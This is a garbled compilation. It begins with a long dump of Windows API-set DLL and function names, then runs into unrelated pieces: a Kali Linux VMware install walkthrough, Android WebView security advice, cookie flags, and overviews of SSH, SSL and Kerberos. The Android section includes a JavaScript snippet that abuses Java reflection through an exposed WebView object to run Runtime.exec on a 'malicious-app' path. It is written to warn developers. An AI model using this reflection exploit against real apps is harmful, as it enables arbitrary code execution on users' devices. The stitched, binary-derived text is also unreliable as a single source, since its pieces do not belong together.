SetKeySecurityRegSetValueExARegSetValueExWRegUnLoadKeyARegUnLoadKeyWapi-ms-win-core-memory-l1-1-0.dllCreateFileMappingWFlushViewOfFileMapViewOfFileMapViewOfFileExOpenFileMappingWReadProcessMemoryUnmapViewOfFileVirtualAllocVirtualAllocExVirtualFreeVirtualFreeExVirtualProtectVirtualProtectExVirtualQueryVirtualQueryExWriteProcessMemoryapi-ms-win-core-misc-l1-1-0.dllEnumSystemLocalesAFatalAppExitAFatalAppExitWFormatMessageAFormatMessageWGlobalAllocGlobalFreeIsProcessInJobIsWow64ProcessLCMapStringALocalAllocLocalFreeLocalLockLocalReAllocLocalUnlocklstrcmplstrcmpAlstrcmpilstrcmpiAlstrcmpiWlstrcmpWlstrcpynlstrcpynAlstrcpynWlstrlenlstrlenAlstrlenWNeedCurrentDirectoryForExePathANeedCurrentDirectoryForExePathWPulseEventSetHandleCountSleepWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionapi-ms-win-core-namedpipe-l1-1-0.dllConnectNamedPipeCreateNamedPipeWCreatePipeDisconnectNamedPipeGetNamedPipeAttributeGetNamedPipeClientComputerNameWImpersonateNamedPipeClientPeekNamedPipeSetNamedPipeHandleStateTransactNamedPipeWaitNamedPipeWapi-ms-win-core-processenvironment-l1-1-0.dllExpandEnvironmentStringsAExpandEnvironmentStringsWFreeEnvironmentStringsAFreeEnvironmentStringsWGetCommandLineAGetCommandLineWGetCurrentDirectoryAGetCurrentDirectoryWGetEnvironmentStringsGetEnvironmentStringsAGetEnvironmentStringsWGetEnvironmentVariableAGetEnvironmentVariableWGetStdHandleSearchPathWSetCurrentDirectoryASetCurrentDirectoryWSetEnvironmentStringsWSetEnvironmentVariableASetEnvironmentVariableWSetStdHandleSetStdHandleExapi-ms-win-core-processthreads-l1-1-0.dllCreateProcessACreateProcessAsUserWCreateProcessWCreateRemoteThreadCreateRemoteThreadExCreateThreadDeleteProcThreadAttributeListExitProcessExitThreadFlushProcessWriteBuffersGetCurrentProcessGetCurrentProcessIdGetCurrentThreadGetCurrentThreadIdGetExitCodeProcessGetExitCodeThreadGetPriorityClassGetProcessIdGetProcessIdOfThreadGetProcessTimesGetProcessVersionGetStartupInfoWGetThreadIdGetThreadPriorityGetThreadPriorityBoostInitializeProcThreadAttributeListOpenProcessTokenOpenThreadOpenThreadTokenProcessIdToSessionIdQueryProcessAffinityUpdateModeQueueUserAPCResumeThreadSetPriorityClassSetProcessAffinityUpdateModeSetProcessShutdownParametersSetThreadPrioritySetThreadPriorityBoostSetThreadStackGuaranteeSetThreadTokenSuspendThreadSwitchToThreadTerminateProcessTerminateThreadTlsAllocTlsFreeTlsGetValueTlsSetValueUpdateProcThreadAttributeapi-ms-win-core-profile-l1-1-0.dllQueryPerformanceCounterQueryPerformanceFrequencyapi-ms-win-core-rtlsupport-l1-1-0.dllRtlCaptureContextRtlCaptureStackBackTraceRtlFillMemoryRtlUnwindapi-ms-win-core-string-l1-1-0.dllCompareStringExCompareStringOrdinalCompareStringWFoldStringWGetStringTypeExWGetStringTypeWMultiByteToWideCharWideCharToMultiByteapi-ms-win-core-synch-l1-1-0.dllAcquireSRWLockExclusiveAcquireSRWLockSharedCancelWaitableTimerCreateEventACreateEventExACreateEventExWCreateEventWCreateMutexACreateMutexExACreateMutexExWCreateMutexWCreateSemaphoreExWCreateWaitableTimerExWDeleteCriticalSectionEnterCriticalSectionInitializeCriticalSectionInitializeCriticalSectionAndSpinCountInitializeCriticalSectionExInitializeSRWLockLeaveCriticalSectionOpenEventAOpenEventWOpenMutexWOpenProcessOpenSemaphoreWOpenWaitableTimerWReleaseMutexReleaseSemaphoreReleaseSRWLockExclusiveReleaseSRWLockSharedResetEventSetCriticalSectionSpinCountSetEventSetWaitableTimerSetWaitableTimerExSleepExTryAcquireSRWLockExclusiveTryAcquireSRWLockSharedTryEnterCriticalSectionWaitForMultipleObjectsExWaitForSingleObjectWaitForSingleObjectExapi-ms-win-core-sysinfo-l1-1-0.dllGetComputerNameExAGetComputerNameExWGetDynamicTimeZoneInformationGetLocalTimeGetLogicalProcessorInformationGetLogicalProcessorInformationExGetSystemDirectoryAGetSystemDirectoryWGetSystemInfoGetSystemTimeGetSystemTimeAdjustmentGetSystemTimeAsFileTimeGetSystemWindowsDirectoryAGetSystemWindowsDirectoryWGetTickCountGetTickCount64GetTimeZoneInformationGetTimeZoneInformationForYearGetVersionGetVersionExAGetVersionExWGetWindowsDirectoryAGetWindowsDirectoryWGlobalMemoryStatusExSetLocalTimeSystemTimeToFileTimeSystemTimeToTzSpecificLocalTimeTzSpecificLocalTimeToSystemTimeapi-ms-win-core-threadpool-l1-1-0.dllCallbackMayRunLongCancelThreadpoolIoChangeTimerQueueTimerCloseThreadpoolCloseThreadpoolCleanupGroupCloseThreadpoolCleanupGroupMembersCloseThreadpoolIoCloseThreadpoolTimerCloseThreadpoolWaitCloseThreadpoolWorkCreateThreadpoolCreateThreadpoolCleanupGroupCreateThreadpoolIoCreateThreadpoolTimerCreateThreadpoolWaitCreateThreadpoolWorkCreateTimerQueueCreateTimerQueueTimerDeleteTimerQueueExDeleteTimerQueueTimerDisassociateCurrentThreadFromCallbackFreeLibraryWhenCallbackReturnsIsThreadpoolTimerSetLeaveCriticalSectionWhenCallbackReturnsQueryThreadpoolStackInformationRegisterWaitForSingleObjectExReleaseMutexWhenCallbackReturnsReleaseSemaphoreWhenCallbackReturnsSetEventWhenCallbackReturnsSetThreadpoolStackInformationSetThreadpoolThreadMaximumSetThreadpoolThreadMinimumSetThreadpoolTimerSetThreadpoolWaitStartThreadpoolIoSubmitThreadpoolWorkTrySubmitThreadpoolCallbackUnregisterWaitExWaitForThreadpoolIoCallbacksWaitForThreadpoolTimerCallbacksWaitForThreadpoolWaitCallbacksWaitForThreadpoolWorkCallbacksapi-ms-win-core-util-l1-1-0.dllBeepDecodePointerDecodeSystemPointerEncodePointerEncodeSystemPointerapi-ms-win-core-xstate-l1-1-0.dllRtlCopyExtendedContextRtlGetEnabledExtendedFeaturesRtlGetExtendedContextLengthRtlGetExtendedFeaturesMaskRtlInitializeExtendedContextRtlLocateExtendedFeatureRtlLocateLegacyContextRtlSetExtendedFeaturesMaskapi-ms-win-security-base-l1-1-0.dllAccessCheckAccessCheckAndAuditAlarmWAccessCheckByTypeAccessCheckByTypeAndAuditAlarmWAccessCheckByTypeResultListAccessCheckByTypeResultListAndAuditAlarmByHandleWAccessCheckByTypeResultListAndAuditAlarmWAddAccessAllowedAceAddAccessAllowedAceExAddAccessAllowedObjectAceAddAccessDeniedAceAddAccessDeniedAceExAddAccessDeniedObjectAceAddAceAddAuditAccessAceAddAuditAccessAceExAddAuditAccessObjectAceAddMandatoryAceAdjustTokenGroupsAdjustTokenPrivilegesAllocateAndInitializeSidAllocateLocallyUniqueIdAreAllAccessesGrantedAreAnyAccessesGrantedCheckTokenMembershipConvertToAutoInheritPrivateObjectSecurityCopySidCreatePrivateObjectSecurityCreatePrivateObjectSecurityExCreatePrivateObjectSecurityWithMultipleInheritanceCreateRestrictedTokenCreateWellKnownSidDeleteAceDestroyPrivateObjectSecurityDuplicateTokenDuplicateTokenExEqualDomainSidEqualPrefixSidEqualSidFindFirstFreeAceFreeSidGetAceGetAclInformationGetFileSecurityWGetKernelObjectSecurityGetLengthSidGetPrivateObjectSecurityGetSecurityDescriptorControlGetSecurityDescriptorDaclGetSecurityDescriptorGroupGetSecurityDescriptorLengthGetSecurityDescriptorOwnerGetSecurityDescriptorRMControlGetSecurityDescriptorSaclGetSidIdentifierAuthorityGetSidLengthRequiredGetSidSubAuthorityGetSidSubAuthorityCountGetTokenInformationGetWindowsAccountDomainSidImpersonateAnonymousTokenImpersonateLoggedOnUserImpersonateSelfInitializeAclInitializeSecurityDescriptorInitializeSidIsTokenRestrictedIsValidAclIsValidRelativeSecurityDescriptorIsValidSecurityDescriptorIsValidSidIsWellKnownSidMakeAbsoluteSDMakeAbsoluteSD2MakeSelfRelativeSDMapGenericMaskObjectCloseAuditAlarmWObjectDeleteAuditAlarmWObjectOpenAuditAlarmWObjectPrivilegeAuditAlarmWPrivilegeCheckPrivilegedServiceAuditAlarmWQuerySecurityAccessMaskRevertToSelfSetAclInformationSetFileSecurityWSetKernelObjectSecuritySetPrivateObjectSecuritySetPrivateObjectSecurityExSetSecurityAccessMaskSetSecurityDescriptorControlSetSecurityDescriptorDaclSetSecurityDescriptorGroupSetSecurityDescriptorOwnerSetSecurityDescriptorRMControlSetSecurityDescriptorSaclSetTokenInformationapi-ms-win-security-lsalookup-l1-1-0.dllLookupAccountNameLocalALookupAccountNameLocalWLookupAccountSidLocalALookupAccountSidLocalWLsaLookupCloseLsaLookupFreeMemoryLsaLookupGetDomainInfoLsaLookupManageSidNameMappingLsaLookupOpenLocalPolicyLsaLookupTranslateNamesLsaLookupTranslateSidsapi-ms-win-security-sddl-l1-1-0.dllConvertSecurityDescriptorToStringSecurityDescriptorWConvertSidToStringSidWConvertStringSecurityDescriptorToSecurityDescriptorWConvertStringSidToSidWapi-ms-win-service-core-l1-1-0.dllRegisterServiceCtrlHandlerExWSetServiceStatusStartServiceCtrlDispatcherWapi-ms-win-service-management-l1-1-0.dllCloseServiceHandleControlServiceExWCreateServiceWDeleteServiceOpenSCManagerWOpenServiceWStartServiceWapi-ms-win-service-management-l2-1-0.dllChangeServiceConfig2WChangeServiceConfigWNotifyServiceStatusChangeWQueryServiceConfig2WQueryServiceConfigWQueryServiceObjectSecurityQueryServiceStatusExSetServiceObjectSecurityapi-ms-win-service-winsvc-l1-1-0.dllChangeServiceConfig2AChangeServiceConfigAControlServiceControlServiceExACreateServiceAI_QueryTagInformationI_ScBroadcastServiceControlMessageI_ScIsSecurityProcessI_ScPnPGetServiceNameI_ScQueryServiceConfigI_ScRpcBindAI_ScRpcBindWI_ScSendPnPMessageI_ScSendTSMessageI_ScValidatePnPServiceNotifyServiceStatusChangeAOpenSCManagerAOpenServiceAQueryServiceConfig2AQueryServiceConfigAQueryServiceStatusRegisterServiceCtrlHandlerARegisterServiceCtrlHandlerExARegisterServiceCtrlHandlerWStartServiceAStartServiceCtrlDispatcherA

Installing KALI Linux in VMware

Installing kali linux( backtrack 6 ) is not much harder as it was in down 1,2,3 versions of backtrack but anyway if you are stuck some where this step by step guide to install kali linux under virtual machine . why virtual machine ? because it gives you a safe environment to play and explore without damaging your physical hard drive , or any data loss what you should know before continue :

basic knowledge of virtual machine'sbasic knowledge of networking concepts ( TCP IP )basic linux or any *nix ( if you ever worked on Linux then you are good to go )time and patience

what is required :

Download Kali LinuxISOvirtual machine ( i am using VMware workstation in tutorial , if you havevirtualbox or vmplayer then its good installation process is pretty same in every virtual platform )

Installation Process :

1 : click on create new virtual machine

create new virtual machine

2 : choose ISO

choose ISO

3 : Select Guest Operating System

select guest operating system

4 : Set name and location 

5 : Set disk space ( 20 GB is good enough, minimum 12 GB to work smoother )

5 : Review the hardware configuration and start the virtual machine 

Select Graphical Install

6 :  Select Graphical Install go through normal language and timezone host-name selection etc
Set your "root" password and don't forget it

set root password and don't forget it

7 : Disk Partition  ( if you are installing freshly without any dual boot then simply use guided and use full virtual disk )

use full virtual disk

8: Select hard-drive and select all-in-one  ( for new users ) or if you don't know just choose all in one 

use full virtual disk

9 :  click on finish partitioning and write changes to disk  , choose yes to write 

10 : wait until installer finish copying files setting system

 

11 :  set network mirror and set boot-loader ( very important )

12 : after installation restart and login with username " root " and password ( what you set at step 6 )

kali linux

Security Considerations for Hybrid Android Applications

In Android versions before 4.2 (Jelly Bean, targetSdkVersion 17), the JavaScript layer, upon getting access to the exposed Java object, can access all of the object's public members using reflection. Reflection is a powerful set of APIs, commonly used by programs that require the ability to examine or modify the runtime behavior of applications running in the Java Virtual Machine. For platforms before API level 17, you can use reflection inside of JavaScript by calling something like:

function execute(cmdArgs) {

boundObj.getClass().forName("Java.lang.Runtime").getMethod("getRuntime",

null).invoke(null,null).exec(cmdArgs);

}

var p = execute(["/data/data/com.yourapp/malicious-app"]);

document.write(getContents(p.getInputStream()));

This could allow an attacker to run malicious Java code in the host application's context, which could pose a security risk. As an application developer, care must be taken to ensure that we expose the Java object to WebView only as necessary, especially in the case of running JavaScript from untrusted sources such as external websites and so on.

 

HttpOnly Cookies and the Secure Flag

 

Cookies are one of the most common ways developers store application data. Among other things, it is used to remember the state of the web application in the previous run. Access to this data by untrusted JavaScript could pose a huge risk to your application. To prevent this, you can make your cookies HttpOnly in the HTTP response. The HttpOnly cookie flag became a standard with the RFC #6265 document that can be found at the ietf.org website.

 

An HttpOnly flagged cookie cannot be stolen easily via non-HTTP methods, such as JavaScript or Flash using document.cookie as a pervasive attack technique. Here's an example of how the HttpOnly attribute is visible in the HTTP headers:

 

HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8

Set-Cookie: id=cdb6352b48e62e0691efe552e3e4cecb; path=/; HttpOnly

 

If you use the SSL protocol for delivering your web content and need to set cookies using JavaScript, then you need to enable the secure flag in your cookie function in order to set a secure cookie.

 

document.cookie = "name=value; expires=date; path=path; domain=domain; secure";

 

Preventing Local Files from Being Loaded in the WebView

 

The setAllowFileAccess() API allows developers to control access to local files by the WebView. This API is one of several WebView settings you can configure at runtime. By default, this setting is enabled for accessing files in the filesystem. This setting does not restrict the WebView to load local resources from the file:///android_asset (assets) and file:///android_res (resources) directories. For security reasons, if your app does not require access to the filesystem, it is a good practice to turn this setting off.

 

settings.setAllowFileAccess(false);

The SSH Protocol

SSH is a protocol, not a product. It is a specification of how to conduct secure communication over a network.The SSH protocol covers authentication, encryption, and the integrity of data transmitted over a network, as shown in Figure 1-2. Let's define these terms:

 

Authentication : Reliably determines someone's identity. If you try to log into an account on a remote computer, SSH asks for digital proof of your identity. If you pass the test, you may log in; otherwise SSH rejects the connection.

 

Encryption :Scrambles data so it is unintelligible except to the intended recipients. This protects your data as it passes over the network.

 

Integrity:Guarantees the data traveling over the network arrives unaltered. If a third party captures and modifies your data in transit, SSH detects this fact.

 

Secure Socket Layer (SSL) Protocol

The Secure Socket Layer (SSL) protocol is an authentication and encryption technique providing security services to TCP clients by way of a Berkeley sockets-style API. It was initially developed by Netscape Communications Corporation to secure the HTTP protocol between web clients and servers, and that is still its primary use, though nothing about it is specific to HTTP. It is on the IETF standards track as RFC-2246, under the name "TLS" for Transport Layer Security. An SSL participant proves its identity by a digital certificate, a set of cryptographic

data. A certificate indicates that a trusted third party has verified the binding between an identity and a given cryptographic key. Web browsers automatically check the certificate provided by a web server when they connect by SSL, ensuring that the server is the one the user intended to contact. Thereafter, transmissions between the browser and the web server are encrypted.SSL is used most often for web applications, but it can also "tunnel" other protocols.

It is secure only if a "trusted third party" exists. Organizations known as certificate authorities (CAs) serve this function. If a company wants a certificate from the CA, the company must prove its identity to the CA through other means, such as legal documents. Once the proof is sufficient, the CA issues the certificate.

For more information, visit the OpenSSL project at:

http://www.openssl.org/

 

Kerberos

Kerberos is a secure authentication system for environments where networks may be monitored, and computers aren't under central control. It was developed as part of Project Athena, a wide-ranging research and development effort at the Massachusetts Institute of Technology (MIT). Kerberos authenticates users by way of tickets, small sequences of bytes with limited lifetimes, while user passwords remain secure on a central machine. Kerberos and SSH solve similar problems but are quite different in scope. SSH is lightweight and easily deployed, designed to work on existing systems with minimal changes. To enable secure access from one machine to another, simply install

an SSH client on the first and a server on the second, and start the server.

 Kerberos, in contrast, requires significant infrastructure to be established before use, such as administrative user accounts, a heavily secured central host, and software for network-wide clock synchronization. In return for this added complexity, Kerberos ensures that users' passwords travel on the network as little as possible and are stored only on the central host. SSH sends passwords across the network (over encrypted connections, of course) on each login and stores keys on each host from which SSH is used. Kerberos also serves other purposes beyond the scope of SSH, including a centralized user account database, access control lists, and a hierarchical model of trust.